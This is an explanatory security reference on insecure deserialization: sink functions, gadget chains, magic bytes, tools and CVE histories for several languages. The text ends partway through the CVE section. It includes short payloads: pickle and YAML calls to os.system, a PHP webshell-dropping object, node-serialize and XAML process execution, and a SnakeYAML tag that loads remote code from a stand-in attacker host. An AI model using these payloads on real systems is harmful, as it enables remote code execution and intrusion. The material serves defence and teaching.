Comprehensive Insecure Deserialization Guide

A practitioner’s reference for insecure deserialization — language-specific attack surface, gadget chain mechanics, real-world CVE chains, tools, and detection/prevention. Compiled from 47 research sources.


Table of Contents

  1. Fundamentals
  2. Attack Surface & Entry Points
  3. Java Deserialization
  4. PHP Object Injection
  5. Python Pickle & ML Pipelines
  6. .NET Deserialization
  7. Ruby Marshal & YAML
  8. Node.js Deserialization
  9. YAML & JSON Format Attacks
  10. Gadget Chains Explained
  11. Real-World CVEs & Exploitation Chains
  12. Tools & Automation
  13. Detection & Static Analysis
  14. Prevention & Mitigation
  15. Signature & Gadget Quick Reference

1. Fundamentals

Insecure deserialization occurs when an application reconstructs program objects from attacker-controlled data without sufficient validation. Serialization converts an in-memory object graph to a byte stream for storage or transit; deserialization reverses the process. The danger is that most native serialization formats are not just data — they are instructions for how to rebuild arbitrary objects, including which classes to instantiate and which methods (constructors, magic methods, callbacks) to run along the way.

Three broad impact classes:

ClassDescriptionCanonical Example
Remote Code ExecutionAttacker reaches a native sink (Runtime.exec, os.system, eval, system()) through a gadget chainJava CommonsCollections → Runtime.exec
Object Injection / Logic AbuseAttacker smuggles an unexpected object type that alters control flow, writes files, or performs SQLiPHP __destructfile_put_contents shell upload
Denial-of-ServiceRecursive object graphs, billion-laughs, hash collision, resource exhaustionSnakeYAML billion-laughs, Java HashMap hash DoS

Why it persists: the vulnerability is in data, not code. The sink (readObject, unserialize, pickle.loads, Marshal.load, BinaryFormatter.Deserialize) looks correct in isolation; the bug is the trust boundary around what reaches it. Static analyzers flag the call but cannot reason about whether the bytes arriving were produced by trusted code.

The gadget chain abstraction: RCE is rarely achieved in a single hop. Instead, attackers assemble a graph of “gadgets” — legitimate classes already on the application classpath that, when deserialized in a particular shape, cause method dispatch to cascade until a dangerous sink is reached. The application doesn’t need to ship malicious code; it only needs to load a library that contains usable gadgets.

Key insight: you cannot patch your way out of this. Every patched gadget chain is followed by another built from different links on the same classpath. The only durable fix is to eliminate native deserialization of untrusted input entirely.


2. Attack Surface & Entry Points

Where serialized blobs cross trust boundaries

CategoryExamples
HTTP parametersBase64-encoded state, token, data, session, view, cache params
CookiesSession cookies, remember_me, flash messages, CSRF tokens encoding objects
Hidden form fieldsASP.NET __VIEWSTATE, Rails _session_id, JSF javax.faces.ViewState
Cache layersMemcached/Redis blobs, Rails cache store with Marshal, Django pickle sessions
Message queuesRabbitMQ, Kafka, ActiveMQ, SQS, ZeroMQ payloads between services
RMI / RPCJava RMI registry, JMX, JNDI, CORBA, DRb
File uploads.ser, .rdb, .pkl, .joblib, .pt, .phar model/checkpoint files
WebSockets / IPCDistributed serving frameworks passing pickle or Marshal over sockets
Email headersX-SerializedObject style custom headers, WSDL SOAP bodies
Log ingestionLog4j-style object injection, Graylog inputs, serialized stack traces
Database columnsOpaque BLOB/bytea fields holding serialized objects

Sink functions by language

Java:     ObjectInputStream.readObject(), XMLDecoder.readObject(),
          XStream.fromXML(), Yaml.load() (SnakeYAML),
          Jackson ObjectMapper with enableDefaultTyping(),
          Kryo.readObject(), Hessian, Castor, Burlap
PHP:      unserialize(), phar:// wrapper (file ops trigger), yaml_parse(),
          Laminas Zend_Serializer, Symfony Serializer XML
Python:   pickle.loads/load, cPickle, joblib.load, torch.load,
          numpy.load(allow_pickle=True), pyyaml yaml.load (unsafe),
          shelve, dill.loads, marshal.loads, jsonpickle.decode
.NET:     BinaryFormatter.Deserialize, SoapFormatter, LosFormatter,
          ObjectStateFormatter, NetDataContractSerializer,
          JavaScriptSerializer (TypeNameHandling),
          Json.NET with TypeNameHandling != None, DataContractSerializer,
          XmlSerializer with arbitrary types
Ruby:     Marshal.load, YAML.load (pre-Psych 4), JSON.parse(create_additions:true),
          Oj.load (default mode), Rails cache store :marshal
Node.js:  node-serialize unserialize(), funcster, serialize-javascript
          (with IIFE), eval-based JSON revivers

Content-type & magic byte fingerprints

FormatSignatureNotes
Java serializedAC ED 00 05 (rO0 base64)ObjectOutputStream header
PHP serializedO:<num>:"ClassName":<num>:{...}Also a:, s:, i: primitives
Python pickle80 04 / 80 05 (proto 4/5)Starts with PROTO opcode
.NET BinaryFormatter00 01 00 00 00 FF FF FF FFSerializationHeaderRecord
Ruby Marshal04 08Major 4, minor 8
ASP.NET ViewState/wEP, /wEX base64 prefixDeserialized server-side
Phar<?php __HALT_COMPILER(); manifestPHP-parsed metadata

3. Java Deserialization

The core primitive

Any class implementing java.io.Serializable can be reconstructed by ObjectInputStream.readObject(). A class may define a private readObject(ObjectInputStream in) method that is invoked during deserialization — this is where custom logic runs, and it is the primary entry ramp for gadget chains.

ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = ois.readObject();   // attacker-controlled byte stream

The default readObject will happily deserialize any class on the classpath that implements Serializable. There is no type filter. The “expected type” cast ((User) ois.readObject()) happens after the object graph is fully reconstructed and all side effects have fired.

Classic sink entry points

SinkLibraryNotes
ObjectInputStream.readObjectJDK coreFoundation of all classic Java deserialization bugs
XMLDecoder.readObjectjava.beansPure XML RCE; constructor chains via <object class=...>
XStream.fromXMLXStreamWhitelist-by-default only since v1.4.18
Yaml.loadSnakeYAML (<2.0)Instantiates arbitrary classes from !! tags
ObjectMapper.readValue + enableDefaultTypingJacksonPolymorphic deserialization via @class hints
Kryo.readObject / readClassAndObjectKryoDefault config registers arbitrary classes
Hessian.getInputStreamHessian/BurlapUsed in older Spring Remoting, Caucho
JNDI lookupJNDI/LDAP/RMILog4Shell’s cousin — remote class loading

Gadget chain anatomy (CommonsCollections1)

The canonical chain, dissected from ysoserial’s CommonsCollections1.java, illustrates the building blocks seen in almost every Java chain:

  1. Entry gadget (readObject trigger). sun.reflect.annotation.AnnotationInvocationHandler has a readObject method that calls memberValues.entrySet(). If memberValues is a dynamic Proxy backed by another AnnotationInvocationHandler, entrySet() routes through InvocationHandler.invoke().
  2. Bridge gadget (method dispatch). The inner AnnotationInvocationHandler.invoke() calls memberValues.get(name). When memberValues is a LazyMap, get() invokes the map’s factory.transform(key) for missing keys.
  3. Transform chain (ChainedTransformer). A ChainedTransformer pipes the initial input through an array of Transformer instances, each feeding the next:
    • ConstantTransformer(Runtime.class) — returns the Runtime class object
    • InvokerTransformer("getMethod", ..., {"getRuntime", new Class[0]}) — reflectively fetches the getRuntime method
    • InvokerTransformer("invoke", ..., {null, new Object[0]}) — invokes it, returning a Runtime instance
    • InvokerTransformer("exec", ..., execArgs) — finally calls Runtime.exec(cmd)

The sink is reached not by any single class being malicious, but by abusing reflection primitives exposed in a widely-used utility library.

Why patching individual gadgets fails

The AnnotationInvocationHandler entry was patched in JDK 8u72 — memberValues must now be a LinkedHashMap. But LazyMap, InvokerTransformer, and ChainedTransformer live in commons-collections and are not part of the JDK. CommonsCollections5 reused the same backend chain but substituted a new entry ramp (BadAttributeValueExpException.readObject calling toString() on an arbitrary object). The backend survived; only the front door changed.

This is the defining pattern of Java deserialization defense: you cannot remove the gadgets (they’re in third-party jars), you cannot remove the sink (it’s in the JDK), and every patched entry is followed by another discovered entry reusing the same backend.

Well-known gadget chain families (ysoserial)

ChainTriggerBackendRequires
CommonsCollections1AnnotationInvocationHandler.readObjectLazyMap + ChainedTransformercommons-collections 3.1, JDK ≤ 8u71
CommonsCollections2PriorityQueue.readObjectcompareTransformingComparatorcommons-collections4 4.0
CommonsCollections5BadAttributeValueExpException.readObjecttoStringLazyMapcommons-collections 3.1, any JDK
CommonsCollections6HashSet.readObjecthashCodeLazyMapcommons-collections 3.1, any JDK
CommonsBeanutils1PriorityQueueBeanComparatorPropertyUtils.getProperty → reflectioncommons-beanutils
Groovy1ConvertedClosure.invokeMethodClosure("execute")Groovy ≤ 2.4.3
Spring1, Spring2ObjectFactory proxy chainsJDK only + spring-coreOlder Spring
Hibernate1, Hibernate2ComponentType.getPropertyValueJDK reflectionHibernate
JRMPClient / JRMPListenerRMI remote class loadingOutbound JRMP callbackNetwork egress
URLDNSHashMap.readObjectURL.hashCodeDNS lookupUseful as blind probe (no RCE)
ROME, Click1, Clojure, JBossInterceptors1, C3P0, MozillaRhino1, Myfaces1, Wicket1VariousVariousApplication-specific

SnakeYAML (CVE-2022-1471)

Before SnakeYAML 2.0, Yaml.load() was effectively equivalent to calling ObjectInputStream.readObject for any class on the classpath. YAML tags like !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker/"]]]] could instantiate a ScriptEngineManager pointed at a remote META-INF/services file, loading arbitrary code via JAR SPI. The maintainers initially declined to change defaults, arguing documentation was sufficient — eight CVEs later, 2.0 finally made SafeConstructor the default.

Jackson polymorphic deserialization

Jackson is safe when deserializing fixed types. It becomes dangerous when ObjectMapper.enableDefaultTyping() is set or classes use @JsonTypeInfo(use = Id.CLASS). The JSON then carries a @class (or @type) hint telling Jackson which concrete class to instantiate, converting a JSON endpoint into an arbitrary gadget instantiation primitive. Blocklists (SubTypeValidator) are maintained by Jackson maintainers but have been bypassed repeatedly.


4. PHP Object Injection

The unserialize() primitive

PHP’s serialize()/unserialize() encode the class name, property names, and property values of any object. On deserialization, PHP instantiates the named class with the encoded property values directly assigned — the constructor is not invoked. Instead, specific “magic methods” fire automatically:

Magic MethodWhen It Fires
__wakeup()Immediately after unserialization
__destruct()When the object is garbage collected (end of request)
__toString()When the object is cast to string (comparisons, echo, string concat)
__call()When an undefined method is invoked
__get() / __set()When undefined properties are accessed
__invoke()When the object is called as a function
__unserialize() (PHP 7.4+)Replaces __wakeup if defined

Serialized string format

O:12:"LoggingClass":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:20:"<?php evilCode(); ?>";}
  • O:12:"LoggingClass" — object of class LoggingClass (name length 12)
  • 2:{...} — two properties
  • s:8:"filename" — string key of length 8
  • s:9:"shell.php" — string value of length 9

Property-Oriented Programming (POP) chains

Like Java gadget chains, but chained through PHP magic methods and method calls in class __destruct / __wakeup / __toString hooks. The Sonar example illustrates the minimal case — a LoggingClass whose destructor writes $this->content to $this->filename. An attacker serializes an instance with filename = "shell.php" and content = "<?php system($_GET[0]); ?>", and the destructor drops a webshell at request end.

Real POP chains are longer. Typical primitives:

  • A destructor that calls $this->obj->method() where $this->obj is another attacker-chosen class
  • A __toString that builds a SQL query or file path from properties
  • A __wakeup that calls eval, include, or file_put_contents on serialized properties
  • A __call that forwards to call_user_func_array($this->callback, $this->args)

PrestaShop, Drupal (CVE-2019-6340), Joomla, Magento, WordPress core, Pydio, phpBB, and SuiteCRM all had disclosed POP chains reaching RCE.

Phar deserialization (pre-PHP 8)

A subtle variant: PHP’s phar:// stream wrapper parses PHAR metadata via unserialize() when any file operation (including file_exists, filesize, is_dir) touches a PHAR file path. An attacker who can:

  1. Upload a file of any extension containing PHAR metadata (the PHAR format tolerates arbitrary headers — JPEG EXIF, GIF comments, etc.)
  2. Trigger a file operation on phar://uploads/avatar.jpg/foo

…reaches unserialize without ever calling it directly. The avatar upload path becomes an RCE. PHP 8.0 removed implicit metadata unserialization; earlier versions remain exposed.

Common PHP deserialization entry points

  • Laravel cookie encryption (when APP_KEY leaks, serialized payloads pass integrity)
  • WooCommerce and WordPress meta fields stored as serialized PHP
  • Yii restoreGET, CodeIgniter session library (with encryption disabled)
  • Symfony Cookie / State components in older versions
  • Legacy Zend Framework Zend_Serializer

5. Python Pickle & ML Pipelines

Pickle is a stack VM, not a data format

pickle.loads() executes a small stack-based virtual machine. One of its opcodes, REDUCE, pops a callable and an argument tuple from the stack and calls them. Any object that defines __reduce__() returning (callable, args) becomes a function call when loaded:

class P:
    def __reduce__(self):
        return (os.system, ("id",))
pickle.dumps(P())   # -> bytes that call os.system("id") on load

There is no blocklist, no sandbox, no way to intercept the call. The Python docs warn about this in a yellow box that approximately nobody reads because the code that loads pickle files is written by ML engineers, not security engineers.

The ML pipeline problem

Every ML tutorial ends with pickle.dump(model, f) / pickle.load(f). Higher-level libraries hide pickle under innocuous names:

FunctionActually Calls
joblib.load(path)pickle.load
torch.load(path) (pre-2.6 default)pickle.load over tensor data
numpy.load(path, allow_pickle=True)pickle.load
dill.loadpickle with extra object support
cloudpickle.loadpickle with closure support
HuggingFace transformers older modelspickle under the hood
ZeroMQ recv_pyobj()pickle.loads on wire bytes

A code reviewer sees joblib.load(model_path) and approves it. The reviewer does not ask where model_path came from. In a typical pipeline the file was downloaded by a training service, pushed to S3, cached by a registry, and finally loaded by inference — the chain of custody is invisible at the load site.

CVE-2025-32444 (vLLM, CVSS 10.0)

vLLM’s Mooncake integration for distributed KV-cache transfer called recv_pyobj() on ZeroMQ sockets bound to 0.0.0.0. Any host on the network could ship a pickle payload and get RCE. The code looked correct — ZMQ is a legitimate IPC mechanism and recv_pyobj is a legitimate API. The bug is that “structured message between trusted workers” silently became “unauthenticated pickle deserialization endpoint.”

LightLLM (CVE-2026-26220)

Same vulnerability class, WebSocket-based. The prefill-decode disaggregation system deserialized incoming binary frames with pickle.loads(). A nonce-based auth check existed but the default nonce was an empty string — falsy in Python, so the check was skipped. The server explicitly refused to bind to localhost, guaranteeing network exposure.

data = await websocket.receive_bytes()
obj = pickle.loads(data)   # untrusted WebSocket binary frame

There was no reason to use pickle for this — the payload was worker registration metadata (strings, ints, dicts). JSON or MessagePack would have worked fine. Pickle was the path of least resistance in Python and nobody thought about it.

PickleScan is fundamentally fragile

Picklescan (used by HuggingFace) parses pickle bytecode and matches against a blocklist of dangerous imports. The problem is architectural: pickle is Turing-complete, and parsing divergence between picklescan and PyTorch creates bypass primitives:

  • ZIP flag bit flipping (Sonatype) — PyTorch’s ZIP reader accepts flipped general-purpose bit flags that picklescan silently skips.
  • Subclass imports (JFrog) — using a subclass of a blocklisted module downgrades picklescan’s “Dangerous” verdict to “Suspicious” while still executing fine.
  • Non-standard file extensions — loader accepts it, scanner ignores it.
  • Gadget diversity — academic research (PickleBall / Brown University CCS 2025) identified 133 exploitable function gadgets across stdlib and common ML deps, achieving near-100% scanner bypass.

Even the best-performing scanner in the PickleBall study let 89% of gadgets through. This is not fixable within the current approach.

torch.load: incomplete migration

Before PyTorch 2.0, torch.load(path) unpickled the entire checkpoint with no restrictions. 2.0 added weights_only=True; 2.6 finally changed the default. But the installed base of unsafe patterns is enormous — old tutorials, copy-pasted notebooks, and vendor scripts that pin PyTorch to earlier versions still exist in production.

Rule for review: torch.load() without weights_only=True is a finding unless the checkpoint source is fully trusted internal infrastructure with integrity verification.

Supply-chain vector

Model weights are distributed as files. A 2025 Brown University study found roughly half of popular HuggingFace repositories still contain pickle-backed models, including releases from Meta, Google, Microsoft, NVIDIA, and Intel. Attack patterns:

  • Compromised account — push new weights, every downstream pull runs the payload
  • Typosquattingbert-base-uncased vs bert_base_uncased
  • Malicious fine-tunes — functional model with payload in serialization wrapper
  • Tensor steganography — hiding callable references in weight perturbations small enough not to affect accuracy

PyYAML’s yaml.load

yaml.load(data) without an explicit Loader defaults to FullLoader in modern PyYAML, which disallows arbitrary Python object construction. But enormous amounts of legacy code pass Loader=yaml.Loader (the unsafe loader) or use pre-5.1 versions where the default was unsafe. The canonical payload:

!!python/object/apply:os.system ["id"]

Docling RCE (CVE-2026-24009) — a shadow vulnerability introduced into Docling via an unpinned PyYAML version that regressed to accepting arbitrary tags in one code path. The fix was to switch to yaml.safe_load unconditionally.


6. .NET Deserialization

The dangerous formatters

.NET ships with multiple serialization APIs; some are safe, several are explicitly marked insecure:

FormatterStatusNotes
BinaryFormatterInsecureMicrosoft: “cannot be made secure”; obsoleted in .NET 5+
SoapFormatterInsecureSame type-loading model as BinaryFormatter
NetDataContractSerializerInsecurePreserves .NET types, loads arbitrary
ObjectStateFormatterInsecureASP.NET ViewState backend
LosFormatterInsecureLegacy ASP.NET
JavaScriptSerializer with SimpleTypeResolverInsecureAllows __type hints
Json.NET with TypeNameHandling != NoneDangerous$type property instantiates arbitrary classes
XmlSerializer with unrestricted typesDangerousRequires declared types at compile time; safer if constrained
DataContractSerializerSaferKnown-types list enforced
System.Text.JsonSafe (default)No polymorphic default

Microsoft’s official guidance: “BinaryFormatter is insecure and can’t be made secure.” Period. There is no allowlist configuration that makes it safe against untrusted input.

Sink patterns

// Classic vulnerable pattern
var fmt = new BinaryFormatter();
var obj = fmt.Deserialize(request.InputStream);   // RCE

// Json.NET danger
var settings = new JsonSerializerSettings {
    TypeNameHandling = TypeNameHandling.All   // or Objects/Arrays
};
var obj = JsonConvert.DeserializeObject<object>(json, settings);

Known .NET RCE gadget families (ysoserial.net)

GadgetWorks AgainstNotes
TypeConfuseDelegateBinaryFormatter, LosFormatter, ObjectStateFormatter, NetDataContractSerializerSorts a list with a MulticastDelegate confused into calling Process.Start
ActivitySurrogateSelectorBinaryFormatter, SoapFormatterAbuses surrogate selector to compile and run C# at deserialization time
ActivitySurrogateSelectorFromFileSameVariant that loads an assembly from disk
WindowsIdentityBinaryFormatter, NetDataContractSerializerUses WindowsIdentity deserialization callback
RolePrincipalSameSecurity principal gadget
DataSetBinaryFormatter, SoapFormatter, XmlSerializer with DataSetSystem.Data.DataSet XML type confusion
SessionSecurityTokenJson.NET, NetDataContractSerializerWIF token gadget
ObjRef (TransparentProxy)Remoting.NET Remoting cross-AppDomain trick
TextFormattingRunPropertiesJson.NETXAML-embedded ObjectDataProvider reach to Process.Start
PSObjectBinaryFormatterPowerShell object gadget

XAML ObjectDataProvider — the universal .NET gadget

The System.Windows.Data.ObjectDataProvider class takes a target type, a method name, and method parameters, and invokes them. Any formatter that can reach XAML parsing (directly or via TextFormattingRunProperties, via XamlReader.Parse, or via Json.NET’s XAML types) can achieve RCE with a single object. It’s the .NET equivalent of InvokerTransformer.

<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
                    xmlns:s="clr-namespace:System;assembly=mscorlib"
                    xmlns:c="clr-namespace:System.Diagnostics;assembly=system">
  <ObjectDataProvider x:Key="x" ObjectType="{x:Type c:Process}" MethodName="Start">
    <ObjectDataProvider.MethodParameters>
      <s:String>cmd.exe</s:String>
      <s:String>/c calc</s:String>
    </ObjectDataProvider.MethodParameters>
  </ObjectDataProvider>
</ResourceDictionary>

ASP.NET ViewState

ViewState is a base64-encoded blob sent in a hidden __VIEWSTATE form field carrying page control state. It is deserialized server-side by ObjectStateFormatter. Protection relies on <machineKey> HMAC validation (when enabled) and encryption. Leak or brute-force of machineKey turns ViewState into an unauthenticated RCE sink — ysoserial.net’s TextFormattingRunProperties gadget is the canonical payload.

This is exactly the attack surface behind the SharePoint ToolShell campaign (CVE-2025-53770) and related CVE-2021-27076 “replay-style” attack. A custom webshell parses parameters from VIEWSTATE, enabling insecure deserialization against on-prem SharePoint. Over 4,600 compromise attempts against 300+ organizations were observed in one week of July 2025.

Defensive must-do: rotate ASP.NET machine keys; enable ValidationMode="3.5" and MAC validation; do not disable ViewState MAC.

Notable .NET deserialization CVEs

CVEProductFormatter
CVE-2020-25258Hyland OnBaseBinaryFormatter
CVE-2021-27076SharePoint (replay-style)ObjectStateFormatter/ViewState
CVE-2021-29508Wire (Proto.Actor)BinaryFormatter
CVE-2022-21969Exchange ServerBinaryFormatter via MAPI
CVE-2023-3513Razer Central ServiceBinaryFormatter IPC
CVE-2023-5914CentralSquareBinaryFormatter
CVE-2023-6184Third-party ASP.NET appViewState
CVE-2025-53770SharePoint (ToolShell)ViewState
CVE-2026-20963SharePointDeserialization RCE
CVE-2026-26114SharePointDeserialization RCE

7. Ruby Marshal & YAML

Marshal.load — a decade of whack-a-mole

Ruby’s Marshal module is the language’s native binary serialization format. Passing any untrusted bytes to Marshal.load should be treated as arbitrary code execution. The vulnerability was first publicly discussed in a 2013 Ruby bug tracker issue by Charlie Somerville (now Hailey) and has resisted fixes ever since.

class UserRestoreController < ApplicationController
  def show
    user_data = params[:data]
    deserialized = Marshal.load(Base64.decode64(user_data))
    render plain: "Restored: #{deserialized.inspect}"
  end
end

Gadget chain timeline

YearGadget / TechniqueTarget
2013Initial Marshal warning issueRuby 2.0
2016Phrack #69 — Rails 3/4 Marshal exploitRails ≤ 4.0
2018Luke Jahnke — “Ruby 2.x Universal RCE Deserialization Gadget Chain” (elttam)Ruby 2.x
2019CVE-2019-5420 (Rails 5.2 Marshal)Rails 5.2
2019Etienne Stalmans — YAML.load universal RCERuby 2.x + Psych
2021William Bowling — “Universal Deserialisation Gadget for Ruby 2.x–3.x”Ruby 2.x/3.x
2022William Bowling — “Round Two” updated gadgetRuby 3.0/3.1
2024Alex Leahu (Include Security) — Rails library-based chainsRails
2024GitHub Security Lab — JSON/XML/YAML/Marshal CodeQL queries + PoCsMulti-format
2024Luke Jahnke — Ruby 3.4 universal RCE + Gem::SafeMarshal escapeRuby 3.4-rc1

The pattern: each patch closes one reachable entry from readObject-equivalent, the gadget backend survives, researchers find another entry, repeat. Ruby 3.1 made YAML’s safe_load the default (via Psych 4). Ruby 3.2 patched Marshal gadgets. Ruby 3.4 was released with yet another chain barely averted.

The Gem::SpecFetcher → Runtime chain (2024)

The current canonical Ruby Marshal universal chain routes through Gem::SpecFetcher, Gem::Version, Gem::RequestSet::Lockfile, Gem::RequestSet, Gem::Resolver::SpecSpecification, Gem::Source::Git, and Gem::Resolver::GitSpecification. The chain ends in shell metacharacter expansion via a git invocation with an attacker-controlled repository name containing backticks:

any.zip → reference field contains `$(id > /tmp/pwn)` → git clone executes it

The gadget lives in RubyGems itself — core Ruby — so the only way to patch it is to change RubyGems internals. Doyensec and Trail of Bits have both found successive variants during RubyGems.org audits.

Where Marshal lurks in real apps

  • Rails cache store with :marshal (the default prior to Rails 7.1)
  • Rails session store in legacy configurations
  • Background job backends — Resque, Sidekiq (with Marshal coder), DelayedJob
  • Cookie-based flash messages in older Rails versions
  • DRb (distributed Ruby) — entire mechanism is Marshal over sockets
  • File-based Ruby object storage.rb.cache, .marshal, .bin

YAML.load and Psych

Psych 4 (Ruby 3.1+) made YAML.load == YAML.safe_load by default. YAML.unsafe_load exists for compatibility. Pre-3.1 code calling YAML.load(user_data) is directly exploitable via !ruby/object: tags that instantiate arbitrary classes:

--- !ruby/object:Gem::Installer
  i: x

Stalmans’s 2019 chain produces ~3 KB of YAML reaching Runtime.exec-equivalent via ERB template evaluation in a Gem::Installer-chained setter.

JSON.parse(create_additions: true)

Ruby’s JSON.parse supports an opt-in mode where {"json_class": "SomeClass", ...} triggers SomeClass.json_create({...}). If any class on the load path defines a vulnerable json_create, this is an RCE path. Oj’s “default mode” enables similar behavior by default.


8. Node.js Deserialization

The node-serialize footgun

The npm package node-serialize serializes objects including functions — by wrapping functions as "_$$ND_FUNC$$_function () { ... }" strings and evaling them on deserialize. Passing untrusted input to serialize.unserialize() is direct RCE via IIFE:

const payload = {
  rce: "_$$ND_FUNC$$_function(){require('child_process').exec('id',function(e,s){console.log(s)});}()"
};
serialize.unserialize(JSON.stringify(payload));

The trailing () in the function string causes immediate invocation. CVE-2017-5941 covered the original disclosure; the package remains on npm with warnings.

funcster, serialize-javascript

Similar patterns; serialize-javascript is relatively safer when used to produce output for client consumption but dangerous if the output is deserialized via eval on the server with attacker control.

Prototype pollution adjacency

Node.js deserialization bugs frequently co-occur with prototype pollution (__proto__ key injection via Object.assign, lodash.merge, JSON.parse + merge). A polluted prototype can modify the behavior of deserialization functions used downstream.

YAML in Node.js

js-yaml had unsafe loading in versions prior to 4.0. yaml package default is safe. Custom schemas and CORE_SCHEMA with type handlers can reintroduce unsafe behavior.

Main sinks to grep for

serialize.unserialize(...)
funcster.deepDeserialize(...)
eval(req.body.something)
new Function(req.body.something)
vm.runInNewContext(untrusted)
js-yaml load() (pre-4.0)
node-phantom, PhantomJS IPC

9. YAML & JSON Format Attacks

YAML is not “just data”

Modern YAML parsers support typed tags (!!, !, !<...>) that trigger class instantiation in the host language:

LanguageUnsafe LoaderTag Syntax
Python (PyYAML <5.1)yaml.load!!python/object/apply:os.system ["id"]
Java (SnakeYAML <2.0)Yaml().load!!javax.script.ScriptEngineManager [...]
Ruby (Psych <4.0)YAML.load!ruby/object:Gem::Installer
.NET (YamlDotNet)Untyped deserializer!System.Diagnostics.Process
Go (yaml.v2 custom unmarshalers)Type-dispatchedTypically safe unless reflective

The maintainer response pattern is often to document the danger rather than change defaults, which is why CVEs in YAML libraries keep landing.

CVE-2022-1471 (SnakeYAML)

After at least eight prior related CVEs, SnakeYAML was finally given an umbrella CVE for “insecure by default.” SnakeYAML <2.0’s Yaml().load() accepts !! tags that instantiate arbitrary Java classes. A reachable YAML parser in any Spring/Jackson/REST ingestion path becomes RCE without authentication. Fixed in 2.0 by making SafeConstructor the default.

CVE-2026-24009 (Docling RCE via PyYAML)

A shadow vulnerability: Docling indirectly loaded PyYAML in a path that used yaml.load without an explicit safe loader, regressing when a dependency pin lapsed. The attack surface was document ingestion — upload a crafted document containing a YAML manifest with !!python/object/apply, and Docling parsed it on the server.

JSON deserialization dangers

Plain JSON isn’t directly vulnerable — JSON grammar has no type tags. But:

  • Polymorphic deserializers (Jackson enableDefaultTyping, Json.NET TypeNameHandling, fastjson autoType) add a @class/$type/@type field that reintroduces type-driven instantiation.
  • jsonpickle (Python) stores Python objects in JSON and round-trips them through pickle semantics on load.
  • Oj (Ruby) in :object mode preserves Ruby class info.
  • JSON.parse in Ruby with create_additions: true dispatches to json_create.

Fastjson (Java) is a notable case: com.alibaba.fastjson.JSON.parseObject(str, Object.class) with autoType enabled has had a continuous stream of RCE chains since 2017 (JdbcRowSetImpl JNDI chain being the canonical one).

XML deserialization

XMLDecoder (Java) and XML-based formatters in .NET (SoapFormatter, XamlReader.Parse) are equivalent in power to their binary cousins. java.beans.XMLDecoder.readObject parses XML that directly specifies method invocations:

<java>
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <string>calc</string>
    </void>
  </object>
</java>

XStream’s default configuration before 1.4.18 allowed similar arbitrary-class instantiation; dozens of CVEs (CVE-2021-21344 through CVE-2021-39154 and onward) document the gadget chain parade.


10. Gadget Chains Explained

The chain-of-method-dispatch abstraction

A gadget chain is a sequence of class method invocations connected by field references, where:

  1. Entry gadget — a class whose readObject, __wakeup, __destruct, __reduce__, etc. is called automatically during deserialization and does something more than set fields.
  2. Relay gadgets — classes whose methods (called by the previous gadget) make further method calls on attacker-controlled fields, propagating control flow.
  3. Sink gadget — terminal class whose invoked method reaches a native “do something dangerous” primitive (exec, eval, system, file write, reflection invoke, HTTP request, deserialize-again).

The attacker picks an object type for each field so that the “dynamic dispatch” at each link points to the next gadget. The chain is then serialized and submitted to the sink.

Why chains exist (the Russian doll metaphor)

No sane developer writes readObject to call Runtime.exec directly. But developers write readObject methods that call this.field.someMethod(), where someMethod is an interface method. The JVM / PHP / Python runtime resolves someMethod at dispatch time based on the actual class of this.field. Swap this.field for a LazyMap or an InvokerTransformer and you’ve changed the target of the call without changing the call site.

Gadget hunting methodology

  1. Seed set: find all classes implementing the deserializable marker (java.io.Serializable, PHP __wakeup/__destruct, Python __reduce__, .NET [Serializable]).
  2. Entry set: filter to classes whose deserialization-time methods do more than field assignment — call any method on a field, any reflection API, any eval-equivalent.
  3. Graph expansion: for each entry, model “what methods does this call on fields I control?” Traverse the call graph backward from known sinks (Runtime.exec, eval, system, include).
  4. Constraint solving: each edge has type requirements (the field must be assignable to an interface that has the called method); solve for a feasible object graph.
  5. Serializability filter: every node in the graph must itself be deserializable by the target format.

Automated gadget discovery tools

ToolLanguageApproach
Gadget InspectorJavaBytecode analysis; finds call-graph paths from readObject to sinks
JOOGIEJavaStatic data-flow analysis
SerHyBridJavaHybrid static/dynamic exploration
PHPGGCPHPCurated chain database with generator CLI
FicklingPythonPickle bytecode parser, static analyzer, and gadget constructor
PickleBallPythonPer-library policy generator, not discovery
Freddy (Burp)MultiDeserialization payload injector with ~30 known chains
ysoserial / ysoserial.netJava / .NETPayload generator for ~30 known Java chains, ~15 .NET
marshalsecJavaNon-JDK serialization formats (Jackson, XStream, Kryo, Hessian, JYaml, Red5)
GadgetProbeJavaDNS-based blind probing to fingerprint classpath classes

The “unpatchable” property

A gadget chain is a path through the classpath. Patching one class on the path closes that specific path but leaves every other path open. The set of gadgets on a modern enterprise Java classpath is combinatorially enormous — any library that does reflection, method dispatch on attacker-controlled fields, or custom deserialization logic is a potential source of gadgets. This is why the only durable fix is to not deserialize untrusted data in native formats.


11. Real-World CVEs & Exploitation Chains

Java

CVEProductChain / Trigger
CVE-2015-4852WebLogic T3CommonsCollections over IIOP
CVE-2015-7501JBoss/JenkinsCommonsCollections via /invoker/JMXInvokerServlet
CVE-2016-1000031Apache Commons FileUploadDiskFileItem reflective file write
CVE-2017-5638Struts2 (S2-045)OGNL via Content-Type (not pure deser, related family)
CVE-2017-10271WebLogicXMLDecoder on WLS-wsat /wls-wsat/CoordinatorPortType
CVE-2018-7489Jackson-databindc3p0 gadget via default typing
CVE-2019-2725WebLogicXMLDecoder unauthenticated RCE
CVE-2019-17571Log4j 1.x SocketServerObjectInputStream on log socket
CVE-2021-44228Log4ShellJNDI lookup (adjacent but not pure deser)
CVE-2022-1471SnakeYAML!!ScriptEngineManager with URLClassLoader
CVE-2022-22963Spring Cloud FunctionSpEL via spring.cloud.function.routing-expression
CVE-2022-22965Spring4ShellClass.module.classLoader binding exposure
CVE-2022-33980Apache Commons ConfigurationScript interpolator
CVE-2023-22518ConfluenceWebWork deserialization
CVE-2024-36991SplunkPath traversal → file-based deser
CVE-2026-33728dd-trace-java RMI instrumentationUnsafe deserialization in RMI instrumentation may lead to RCE
CVE-2026-33439OpenAMPre-auth RCE via Java deserialization

PHP

CVEProductChain
CVE-2015-8562JoomlaUser-Agent injection → session deser → POP chain
CVE-2016-9920PhpMyAdmin__destruct file write
CVE-2017-12794SymfonyProperty injection via session cookie
CVE-2018-17057Yii 2__destruct via BatchAction
CVE-2019-6340Drupal 8REST _type POP chain
